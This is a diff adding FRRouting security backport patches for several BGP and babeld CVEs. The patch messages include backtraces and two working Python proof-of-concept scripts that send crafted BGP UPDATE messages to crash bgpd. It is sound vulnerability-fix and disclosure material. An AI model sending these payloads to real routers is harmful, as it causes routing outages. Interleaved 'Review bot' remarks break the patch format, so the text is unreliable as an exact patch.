@@ -0,0 +1,100 @@ +From e51ca641b4a96e575be069aeea922e31f7b8dfa4 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Tue, 22 Aug 2023 22:52:04 +0300 +Upstream: yes +References: CVE-2023-41358,bsc#1214735,https://github.com/FRRouting/frr/pull/14260 +Subject: [PATCH] bgpd: Do not process NLRIs if the attribute length is + zero + +``` +3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26 +4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=) at lib/sigevent.c:246 +5 +6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400) + at bgpd/bgp_routemap.c:2258 +7 0x00007f423aeec7e0 in route_map_apply_ext (map=, prefix=prefix@entry=0x7fffc414ea30, + match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690 +8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770, + afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130) + at bgpd/bgp_route.c:1772 +9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0, + attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0, + num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374 +10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0) + at bgpd/bgp_route.c:6249 +11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, + packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339 +12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024 +13 
0x0000564dea2c901d in bgp_process_packet (thread=) at bgpd/bgp_packet.c:2933 +14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995 +15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213 +16 0x0000564dea261b83 in main (argc=, argv=) at bgpd/bgp_main.c:505 +``` + +With the configuration: + +``` +frr version 9.1-dev-MyOwnFRRVersion +frr defaults traditional +hostname ip-172-31-13-140 +log file /tmp/debug.log +log syslog +service integrated-vtysh-config +! +debug bgp keepalives +debug bgp neighbor-events +debug bgp updates in +debug bgp updates out +! +router bgp 100 + bgp router-id 9.9.9.9 + no bgp ebgp-requires-policy + bgp bestpath aigp + neighbor 172.31.2.47 remote-as 200 + ! + address-family ipv4 unicast + neighbor 172.31.2.47 default-originate + neighbor 172.31.2.47 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +! +``` + +The issue is that we try to process NLRIs even if the attribute length is 0. + +Later bgp_update() will handle route-maps and a crash occurs because all the +attributes are NULL, including aspath, where we dereference. + +According to the RFC 4271: + +A value of 0 indicates that neither the Network Layer + Reachability Information field nor the Path Attribute field is + present in this UPDATE message. + +But with a fuzzed UPDATE message this can be faked. I think it's reasonable +to skip processing NLRIs if both update_len and attribute_len are 0. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 4947dbc21d..1ef421028f 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1951,7 +1951,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. 
*/ + update_len = end - stream_pnt(s); + +- if (update_len) { ++ if (update_len && attribute_len) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.35.3 + diff --git a/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch b/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch new file mode 100644 index 0000000..d59a1d0 --- /dev/null +++ b/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch 
@@ -0,0 +1,131 @@ +From 129adde0aef424778d6c4791b5be10e302db9320 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Thu, 13 Jul 2023 22:32:03 +0300 +Upstream: yes +References: CVE-2023-38802,bsc#1213284,https://github.com/FRRouting/frr/pull/14290 +Subject: [PATCH] bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute + +Before this path we used session reset method, which is discouraged by rfc7606. + +Handle this as rfc requires. + +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index c6177a1b93..188393b752 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1301,6 +1301,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_LARGE_COMMUNITIES: + case BGP_ATTR_ORIGINATOR_ID: + case BGP_ATTR_CLUSTER_LIST: ++ case BGP_ATTR_ENCAP: + case BGP_ATTR_OTC: + return BGP_ATTR_PARSE_WITHDRAW; + case BGP_ATTR_MP_REACH_NLRI: +@@ -2426,26 +2427,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args) + } + + /* Parse Tunnel Encap attribute in an UPDATE */ +-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ +- bgp_size_t length, /* IN: attr's length field */ +- struct attr *attr, /* IN: caller already allocated */ +- uint8_t flag, /* IN: attr's flags field */ +- uint8_t *startp) ++static int bgp_attr_encap(struct bgp_attr_parser_args *args) + { +- bgp_size_t total; + uint16_t tunneltype = 0; +- +- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 
4 : 3); ++ struct peer *const peer = args->peer; ++ struct attr *const attr = args->attr; ++ bgp_size_t length = args->length; ++ uint8_t type = args->type; ++ uint8_t flag = args->flags; + + if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS) + || !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) { +- zlog_info( +- "Tunnel Encap attribute flag isn't optional and transitive %d", +- flag); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d", ++ flag); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + if (BGP_ATTR_ENCAP == type) { +@@ -2453,12 +2449,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + uint16_t tlv_length; + + if (length < 4) { +- zlog_info( ++ zlog_err( + "Tunnel Encap attribute not long enough to contain outer T,L"); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + tunneltype = stream_getw(BGP_INPUT(peer)); + tlv_length = stream_getw(BGP_INPUT(peer)); +@@ -2488,13 +2483,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + } + + if (sublength > length) { +- zlog_info( +- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", +- sublength, length); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", ++ sublength, length); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + /* alloc and copy sub-tlv */ +@@ -2542,13 +2535,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + + if (length) { + /* spurious leftover data */ +- 
zlog_info( +- "Tunnel Encap attribute length is bad: %d leftover octets", +- length); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets", ++ length); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + return 0; +@@ -3387,8 +3377,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + case BGP_ATTR_VNC: + #endif + case BGP_ATTR_ENCAP: +- ret = bgp_attr_encap(type, peer, length, attr, flag, +- startp); ++ ret = bgp_attr_encap(&attr_args); + break; + case BGP_ATTR_PREFIX_SID: + ret = bgp_attr_prefix_sid(&attr_args); +-- +2.35.3 + diff --git a/0011-babeld-fix-11808-to-avoid-infinite-loops.patch b/0011-babeld-fix-11808-to-avoid-infinite-loops.patch new file mode 100644 index 0000000..06c2d6e --- /dev/null +++ b/0011-babeld-fix-11808-to-avoid-infinite-loops.patch 
@@ -0,0 +1,48 @@
+From 8a8f20d89585aa490e3cae5ad705ce23107fc1fe Mon Sep 17 00:00:00 2001
+From: harryreps
+Date: Fri, 3 Mar 2023 23:17:14 +0000
+Upsteam: yes
+References: CVE-2023-3748,bsc#1213434,gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952
+Subject: [PATCH] babeld: fix #11808 to avoid infinite loops
+
+Replacing continue in loops to goto done so that index of packet buffer
+increases.
+
+Signed-off-by: harryreps
+(cherry picked from commit ae1e0e1fed77716bc06f181ad68c4433fb5523d0)
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/babeld/message.c b/babeld/message.c
+index 7d45d91bf7..2bf2337965 100644
+--- a/babeld/message.c
++++ b/babeld/message.c
+@@ -439,7 +439,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
+ debugf(BABEL_DEBUG_COMMON,
+ "Received Hello from %s on %s that does not have all 0's in the unused section of flags, ignoring",
+ format_address(from), ifp->name);
+- continue;
++ goto done;
+ }
+ 
+ /*
+@@ -451,7 +451,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
+ debugf(BABEL_DEBUG_COMMON,
+ "Received Unicast Hello from %s on %s that FRR is not prepared to understand yet",
+ format_address(from), ifp->name);
+- continue;
++ goto done;
+ }
+ 
+ DO_NTOHS(seqno, message + 4);
+@@ -469,7 +469,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
+ debugf(BABEL_DEBUG_COMMON,
+ "Received hello from %s on %s should be ignored as that this version of FRR does not know how to properly handle interval == 0",
+ format_address(from), ifp->name);
+- continue;
++ goto done;
+ }
+ 
+ changed = update_neighbour(neigh, seqno, interval);
+-- 
+2.35.3
+
diff --git a/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch b/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
new file mode 100644
index 0000000..ced2b9c
--- /dev/null
+++ b/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
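Review bot: The three `goto done` sites rely on the `done:` label being placed before the per-TLV offset advance at the bottom of parse_packet's loop, and neither the label nor that increment is in the hunk, so the backport should be checked against the loop tail; any `continue` left elsewhere in the same loop keeps the original hang reachable. A comment at the first site would keep the intent from being undone by a later cleanup: `/* never 'continue' here: done: advances the buffer offset, a bare continue re-parses the same TLV forever */`. parse_packet starts and ends outside the hunk. The header also says `Upsteam: yes` where the other patches in this series use `Upstream: yes`, which matters if tooling greps that trailer.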
@@ -0,0 +1,37 @@
+From 168204de6371f594c4f1ebac30ca3e181a851e39 Mon Sep 17 00:00:00 2001
+From: Donald Sharp
+Date: Wed, 5 Apr 2023 14:57:05 -0400
+Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit
+ withdrawal
+Upsteam: yes
+References: CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8
+
+All other parsing functions done from bgp_nlri_parse() assume
+no attributes == an implicit withdrawal. Let's move
+bgp_nlri_parse_flowspec() into the same alignment.
+
+Reported-by: Matteo Memelli
+Signed-off-by: Donald Sharp
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
+index 39c0cfe514..fe1f0d50f8 100644
+--- a/bgpd/bgp_flowspec.c
++++ b/bgpd/bgp_flowspec.c
+@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
+ afi = packet->afi;
+ safi = packet->safi;
+ 
++ /*
++ * All other AFI/SAFI's treat no attribute as a implicit
++ * withdraw. Flowspec should as well.
++ */
++ if (!attr)
++ withdraw = 1;
++
+ if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) {
+ flog_err(EC_BGP_FLOWSPEC_PACKET,
+ "BGP flowspec nlri length maximum reached (%u)",
+-- 
+2.35.3
+
diff --git a/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch b/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
new file mode 100644
index 0000000..dc1a41c
--- /dev/null
+++ b/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
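Review bot: The `if (!attr) withdraw = 1;` guard is added to bgp_nlri_parse_flowspec alone, while the commit message says every other parser dispatched from bgp_nlri_parse() already applies the same rule, so one check in the dispatcher before the per-AFI/SAFI call would cover the next parser that forgets it. `withdraw` is declared and consumed outside the hunk; confirm nothing later in the function re-derives it from `packet` and silently undoes this assignment. The new comment could name the rule instead of the precedent, e.g. `/* NLRI without path attributes cannot be installed: treat-as-withdraw (RFC 7606). */`. The header again reads `Upsteam: yes` instead of `Upstream: yes`.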
@@ -0,0 +1,115 @@ +From 1fdbfffbe343ad63c32ff37998300b0b4f67d8fb Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Mon, 23 Oct 2023 23:34:10 +0300 +Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE + message +Upstream: yes +References: CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4 + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... 
+BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic +Signed-off-by: 
Donatas Abraitis +(cherry picked from commit d8482bf011cb2b173e85b65b4bf3d5061250cdb9) +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 188393b752..5c028c854c 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3098,13 +3098,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. */ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3156,7 +3158,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + enum bgp_attr_parse_ret ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3478,7 +3480,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.35.3 + diff --git a/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch b/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch new file mode 100644 index 0000000..83edea3 --- /dev/null +++ b/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch 
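Review bot: The new `!length` term in bgp_attr_check tests the per-attribute `length` local of the parse loop (the value the attribute switch hands to each per-type parser), not the total path-attribute length, so a crafted UPDATE whose only attribute is an unknown transitive one with a zero-length body still has `attr->flag == 0` and `length == 0` and takes the BGP_ATTR_PARSE_PROCEED early return this fix is meant to close. If bgp_attr_parse receives the total path-attribute length as a parameter (the rest of its signature is outside the hunk), passing that instead, e.g. `ret = bgp_attr_check(peer, attr, size);`, expresses the End-of-RIB condition exactly. A comment on the new parameter would also help, since `length` now carries two meanings in that file: `/* length: 0 only when the UPDATE carried no path attributes at all (EoR) */`. bgp_attr_parse starts and ends outside the hunk.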
@@ -0,0 +1,121 @@ +From f2bc4e6847b222ed8fbd460fbba9aa69d1bf8d0e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Fri, 20 Oct 2023 17:49:18 +0300 +Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset +Upstream: yes +References: CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35 + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! 
+route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit b08afc81c60607a4f736f418f2e3eb06087f1a35) +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 5c028c854c..42a2342f6f 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2224,7 +2224,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3405,10 +3405,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 4963ea64d0..23767153b2 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -382,7 +382,6 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 1ef421028f..20c642190b 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2027,8 +2027,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -2049,9 +2048,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + && 
nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.35.3 + diff --git a/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch b/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch new file mode 100644 index 0000000..98ea81d --- /dev/null +++ b/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch 
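Review bot: The short MP_REACH_NLRI now goes to `bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0)`, which for this attribute type presumably ends in a NOTIFICATION, and the hunk at the same time removes the code that accepted such an attribute as an MP End-of-RIB, so a peer that encodes EoR as an empty MP_REACH_NLRI is reset rather than ignored; the comment kept in bgp_update_receive ("MP EoR should have only an empty MP_UNREACH") is consistent with RFC 4724, so this is the intended hardening, but it deserves a comment at the call site so it is not "fixed" back later: `/* A truncated MP_REACH_NLRI is not an End-of-RIB marker (that is an empty MP_UNREACH_NLRI, RFC 4724); treat as malformed. */`. The trailing `0` passed as the notification data length also warrants a word, since the other bgp_attr_malformed callers in this series pass `args->total`. bgp_mp_reach_parse starts and ends outside the hunk.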
@@ -0,0 +1,109 @@ +From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Fri, 27 Oct 2023 11:56:45 +0300 +Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of + malformed attrs +Upstream: yes +CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! 
+route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 42a2342f6f..fc92dbb326 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. 
